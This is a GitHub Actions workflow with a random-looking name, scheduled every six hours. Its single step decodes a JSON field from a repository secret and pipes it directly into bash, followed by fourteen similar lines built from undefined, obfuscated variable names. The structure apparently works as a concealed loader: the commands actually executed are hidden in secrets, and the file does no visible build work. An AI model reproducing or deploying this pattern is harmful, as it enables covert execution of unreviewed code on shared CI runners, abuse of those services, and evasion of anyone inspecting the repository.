name: pengzhongzhou2013
on:
  workflow_dispatch:
  schedule:
    - cron: '29 4/6 * * *'
jobs:  # 20629
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: pengzhongzhou2013
        env:
          p88: ${{ secrets.p88 }}
        run: |
          echo $p88 | jq -r .wox49 | /bin/bash
          echo $hb91672 | jq -r .z38 | /bin/bash
          echo $pz36219 | jq -r .cpj1051 | /bin/bash
          echo $k78 | jq -r .cv98 | /bin/bash
          echo $zqmy6093 | jq -r .hvv28 | /bin/bash
          echo $r9 | jq -r .ah3 | /bin/bash
          echo $nqg21 | jq -r .iombu501 | /bin/bash
          echo $hfynj89 | jq -r .jolp8 | /bin/bash
          echo $a17594 | jq -r .lhwc558 | /bin/bash
          echo $kon23 | jq -r .wxnsk8 | /bin/bash
          echo $chvfl0 | jq -r .w351 | /bin/bash
          echo $a511 | jq -r .qlwhp13 | /bin/bash
          echo $uyfo31 | jq -r .rvg771 | /bin/bash
          echo $yng2401 | jq -r .jqz30277 | /bin/bash
          echo $iu86 | jq -r .s3957 | /bin/bash

